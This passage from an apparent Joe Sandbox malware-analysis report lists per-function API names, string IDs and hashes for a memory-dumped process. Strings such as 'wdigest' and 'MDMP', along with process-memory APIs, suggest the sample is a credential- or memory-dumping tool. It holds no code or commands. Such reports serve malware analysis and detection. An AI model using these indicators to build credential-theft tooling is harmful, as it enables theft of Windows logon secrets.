                                                • Opcode Fuzzy Hash: c10b66f4ad814e9fa5aeb7ac24dc57c405e661451348fa1c704a1c9b0a9cf0d4
                                                • Instruction Fuzzy Hash: 16315132608B8186EB60EF25E8402AEB3A4FB88754FD0053AEADD43B95DF78D545CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                • API String ID: 2643518689-564504941
                                                • Opcode ID: 983c9f2333094e1b072063431f3be2ba307fb593598efd7c4007a27adeb72045
                                                • Instruction ID: 2741c03800bb0a4eacb95d56e021af2b4bc0a41c9fef033b5323542664029578
                                                • Opcode Fuzzy Hash: 983c9f2333094e1b072063431f3be2ba307fb593598efd7c4007a27adeb72045
                                                • Instruction Fuzzy Hash: 7B510B60B0AB0695ED65BB12EC14138A3A1EF49B94FC4043FDCCE06750EE7CE545DB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: FreeLocal$AddressHandleModuleProcwsprintf
                                                • String ID: %lS%lS%lS:%lS$WriteFile$kernel32
                                                • API String ID: 602150089-2677625405
                                                • Opcode ID: 70e0f67277f0841249df6cb2576359257559e6208f03e54691c210a9b83f7430
                                                • Instruction ID: 0daecf80f8e4ac393bdab0eaa277918188dbe913371b3d5ca883ebc7e1498c7b
                                                • Opcode Fuzzy Hash: 70e0f67277f0841249df6cb2576359257559e6208f03e54691c210a9b83f7430
                                                • Instruction Fuzzy Hash: 85515B61B08B4681EE54EB12EC44279A3A0FF45B84FC4413ADD9E4B7A5CF3CE589CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FreeLocal
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 3514375268-3502785670
                                                • Opcode ID: 6bd0fb887aef256e37558b6eca73b75d724f5de7622ad22812177d065e869bd8
                                                • Instruction ID: 5ff77ba074a294be51f29a50d0c3a5bae18c6839624dfe3e69b87d319fde996d
                                                • Opcode Fuzzy Hash: 6bd0fb887aef256e37558b6eca73b75d724f5de7622ad22812177d065e869bd8
                                                • Instruction Fuzzy Hash: 69415C75B04B0685EA58AF16EC44229E761FB89F84FD4803ACE8E17354DE3DDC89CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E9030EA
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E9030FA
                                                • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E9031CE
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E9031DE
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E90324C
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E903255
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLocalModuleProc
                                                • String ID: KSSM$LocalAlloc$RUUU$kernel32
                                                • API String ID: 1697219777-2069434485
                                                • Opcode ID: 98452fb87b6a503e7525daa5d99c8607968f07bcedb0029b331a5fc9e0c253e1
                                                • Instruction ID: 904dcb70e155ec57b8b5207ac98f7709035f7014d89f6bf269f4001597a5405e
                                                • Opcode Fuzzy Hash: 98452fb87b6a503e7525daa5d99c8607968f07bcedb0029b331a5fc9e0c253e1
                                                • Instruction Fuzzy Hash: 34517F71B18B2289EB50DB62EC445ADB374FB44B88BC4403ADE8E43B98DF38D545CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: File$HandleView$AddressCloseCreateMappingModuleProcUnmap
                                                • String ID: LocalAlloc$MDMP$kernel32
                                                • API String ID: 3734750734-1949004057
                                                • Opcode ID: 116d9f2a7bbc1342e99dcb4cdffffe6c648fd1123236cbe15307c43cc3f19f43
                                                • Instruction ID: cc420e71b5f4e45743d1fad382eb7bcc92bfcbe2e7b9afdf66b83ca3294740ef
                                                • Opcode Fuzzy Hash: 116d9f2a7bbc1342e99dcb4cdffffe6c648fd1123236cbe15307c43cc3f19f43
                                                • Instruction Fuzzy Hash: BD218436A04A45C2EB15DF26E850628B3B0FB89F48BC4C136CA8D07B14DF3CD555CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906DAA
                                                • malloc.LIBCMT ref: 00007FF72E906E13
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906E47
                                                • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906E6E
                                                • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906EB6
                                                • malloc.LIBCMT ref: 00007FF72E906F13
                                                  • Part of subcall function 00007FF72E908D54: _FF_MSGBANNER.LIBCMT ref: 00007FF72E908D84
                                                  • Part of subcall function 00007FF72E908D54: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72E907550,?,?,?,00007FF72E907415,?,?,?,00007FF72E9074BF), ref: 00007FF72E908DA9
                                                  • Part of subcall function 00007FF72E908D54: _callnewh.LIBCMT ref: 00007FF72E908DC2
                                                  • Part of subcall function 00007FF72E908D54: _errno.LIBCMT ref: 00007FF72E908DCD
                                                  • Part of subcall function 00007FF72E908D54: _errno.LIBCMT ref: 00007FF72E908DD8
                                                • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906F48
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906F88
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiStringWide$_errnomalloc$AllocateHeap_callnewh
                                                • String ID:
                                                • API String ID: 1202131735-0
                                                • Opcode ID: dd9570aa4753c2afcf5721764926eca41ff4862465789e9c0155039f71b2df62
                                                • Instruction ID: 6d4617c7a7acb57a9916c8e652fa22a6c9b704f783b72561df51567a3de891dc
                                                • Opcode Fuzzy Hash: dd9570aa4753c2afcf5721764926eca41ff4862465789e9c0155039f71b2df62
                                                • Instruction Fuzzy Hash: 1B81C332B0879286EB24AF25DC40169B6A5FF487A4FD4023AEA9D47FD5DF3CD5408B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockmalloc
                                                • String ID:
                                                • API String ID: 2923989369-0
                                                • Opcode ID: e440e551b0ad07899f4c880d3f1a5defb53fbcf731c378437f33f8a7493ee88d
                                                • Instruction ID: 1868bbdf24d4c0b27183229f67a40ee15e355c8282d077f396dec44e9147eb1a
                                                • Opcode Fuzzy Hash: e440e551b0ad07899f4c880d3f1a5defb53fbcf731c378437f33f8a7493ee88d
                                                • Instruction Fuzzy Hash: F5213921E1864282F664BB21EC0437AA656EF407A4FD4443EDACE467D2CF7DA4848B62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: FreeLocal$AddressComputerHandleModuleNameProc
                                                • String ID: wdigest
                                                • API String ID: 3388486035-141766858
                                                • Opcode ID: 921b520e0e78bd4b07dbd0b9b6bee5ed3c5810e11c76f82449315c0cb00326d4
                                                • Instruction ID: 0da27f5f5f449529099fd622c104ba6a3ff4ac248279c220466c0becabc15ea9
                                                • Opcode Fuzzy Hash: 921b520e0e78bd4b07dbd0b9b6bee5ed3c5810e11c76f82449315c0cb00326d4
                                                • Instruction Fuzzy Hash: 9F41A132B1CA0286EA64EB55D894379A391FF85B84FC4413EDA9D43790DF7CE885CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FreeLocal$ControlDeviceFileMemoryPointerProcessWrite
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 921870457-3502785670
                                                • Opcode ID: c2d3718dd5d60db368948a814df00d793689cacde74765b4f95d6400b201580f
                                                • Instruction ID: 44713fc5fbeb49fd75eed6233cc3158a5c23df8e17b89fc28d3bc44ed6946ab2
                                                • Opcode Fuzzy Hash: c2d3718dd5d60db368948a814df00d793689cacde74765b4f95d6400b201580f
                                                • Instruction Fuzzy Hash: 9C312D72A04B06C9EB10DF61EC400AC73B4FB49788B84453ADE8D57B58DF38E554CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLocalModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 1697219777-3502785670
                                                • Opcode ID: 10c26d9d398fdaec95026ad6e01248a2c3b5e10236f96505c4f08843d7340071
                                                • Instruction ID: ecb22b6fb4196a4d54fc9597eac51aaa1c86dc1eee540d8962610cd7f487e243
                                                • Opcode Fuzzy Hash: 10c26d9d398fdaec95026ad6e01248a2c3b5e10236f96505c4f08843d7340071
                                                • Instruction Fuzzy Hash: 16312861A19B0689FB40EB60EC403BC63B4FB55788FC0053ACA9C17664EF7CE584CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E9086B9
                                                • DecodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E9086C9
                                                  • Part of subcall function 00007FF72E90918C: _errno.LIBCMT ref: 00007FF72E909195
                                                  • Part of subcall function 00007FF72E90918C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72E9091A0
                                                • EncodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E908747
                                                  • Part of subcall function 00007FF72E907624: realloc.LIBCMT ref: 00007FF72E90764F
                                                  • Part of subcall function 00007FF72E907624: Sleep.KERNEL32(?,?,00000000,00007FF72E908737,?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02), ref: 00007FF72E90766B
                                                • EncodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E908757
                                                • EncodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E908764
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                • String ID:
                                                • API String ID: 1909145217-0
                                                • Opcode ID: c52e1b09a50c06291591c65438d86ecc49300948b8df8488fe33684004ad8daa
                                                • Instruction ID: fed18850e507b96439b31f8974cccc9d6d3212bfff3d343bb3147e2f5512e6ad
                                                • Opcode Fuzzy Hash: c52e1b09a50c06291591c65438d86ecc49300948b8df8488fe33684004ad8daa
                                                • Instruction Fuzzy Hash: 03218021B0AB4281EE51BB21ED48069E2D1FB48BD0FC4483AD9CE17358DE7CE485CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                • String ID:
                                                • API String ID: 1445889803-0
                                                • Opcode ID: f9202979a7542460e9361c27ea97c69b921579607e91b3df6b9d0368e6733a29
                                                • Instruction ID: d2f128813f0ea6278b9ad407cd5775872b1d51adce1ef685cedd0184859c35a8
                                                • Opcode Fuzzy Hash: f9202979a7542460e9361c27ea97c69b921579607e91b3df6b9d0368e6733a29
                                                • Instruction Fuzzy Hash: A201A531A2DA0581FB50AF26FC44165A360FB09B90FC42536DE9E47760CF3CD8848B11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D,?,?,?,?,00007FF72E903612), ref: 00007FF72E905282
                                                • FlsGetValue.KERNEL32(?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D,?,?,?,?,00007FF72E903612), ref: 00007FF72E905290
                                                • SetLastError.KERNEL32(?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D,?,?,?,?,00007FF72E903612), ref: 00007FF72E9052E8
                                                  • Part of subcall function 00007FF72E9075A0: Sleep.KERNEL32(?,?,?,00007FF72E9052AB,?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D), ref: 00007FF72E9075E5
                                                • FlsSetValue.KERNEL32(?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D,?,?,?,?,00007FF72E903612), ref: 00007FF72E9052BC
                                                • GetCurrentThreadId.KERNEL32 ref: 00007FF72E9052D0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue_lock$CurrentSleepThread
                                                • String ID:
                                                • API String ID: 2194181773-0
                                                • Opcode ID: ad224dec72481b030033efa864b9fd969c3be0249bf7685e36258ed4f4ac13e2
                                                • Instruction ID: 82c3ae1f9502d10215d7fe6f36f22bd9fbf04162015c3a083982fd6dd94ff421
                                                • Opcode Fuzzy Hash: ad224dec72481b030033efa864b9fd969c3be0249bf7685e36258ed4f4ac13e2
                                                • Instruction Fuzzy Hash: 85011231A09742C6FF54BB65EC48038A291EF48770BD4863DD9AD423D1EE3CE4448A26
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                                • String ID: A$Z
                                                • API String ID: 3686281101-4098844585
                                                • Opcode ID: 896e6f80aa2ca831a9021138f11eca69d54130ecbc77755b1876e4c48633c6f8
                                                • Instruction ID: 54d74fcefdd941e425081a001890482e3afa312405bd1ea2724cc8dfe8d03279
                                                • Opcode Fuzzy Hash: 896e6f80aa2ca831a9021138f11eca69d54130ecbc77755b1876e4c48633c6f8
                                                • Instruction Fuzzy Hash: 5021D662F1829385FB707B15D94017DF6A0EB51BA0FD8413BEADD076D8CE2CD8818B26
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FilePointer
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 566066777-3502785670
                                                • Opcode ID: c5291f9e83ebfd14ac5185bb3fe49c08fc751065ba87d2c77bd2fa49d6794c12
                                                • Instruction ID: 66e8321322bb848b4788902b0c78d50bda58d54f9ffdc0c5b4493ae7ae64cd00
                                                • Opcode Fuzzy Hash: c5291f9e83ebfd14ac5185bb3fe49c08fc751065ba87d2c77bd2fa49d6794c12
                                                • Instruction Fuzzy Hash: 86116D32A09B4686DB14EB05F88402DB3F5FB48B84B95813ADBEC43754EF79D996CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 1646373207-3502785670
                                                • Opcode ID: 56eea7980c05d2758158436c454b14cc82090c226630c926929492b140c91de7
                                                • Instruction ID: 4589a9c2a4c7d0ef73f98708a4ce22d43933a38a6c93298a6d959ef792bd30dc
                                                • Opcode Fuzzy Hash: 56eea7980c05d2758158436c454b14cc82090c226630c926929492b140c91de7
                                                • Instruction Fuzzy Hash: FAF0BE61B09A0796EE44FB5AEC90038A361EF48F84BC8903ACB9D07354EE3CD594CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF72E9058D5,?,?,00000028,00007FF72E908D9D,?,?,00000000,00007FF72E907550,?,?,?,00007FF72E907415), ref: 00007FF72E90589B
                                                • GetProcAddress.KERNEL32(?,?,000000FF,00007FF72E9058D5,?,?,00000028,00007FF72E908D9D,?,?,00000000,00007FF72E907550,?,?,?,00007FF72E907415), ref: 00007FF72E9058B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 1646373207-1276376045
                                                • Opcode ID: f78ffa323bab2fd1d92cb2e075742adc844aeb1b3a717ca98cca0424df0a5935
                                                • Instruction ID: 3a1fb03f25259c323c6e83b2eedd5e861888a31feceed2568392b09e62ecf561
                                                • Opcode Fuzzy Hash: f78ffa323bab2fd1d92cb2e075742adc844aeb1b3a717ca98cca0424df0a5935
                                                • Instruction Fuzzy Hash: 68E01260F1A60646FF19BBA0FC841745361EF49B00BC8943ECD9E46390EEACA64DCB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
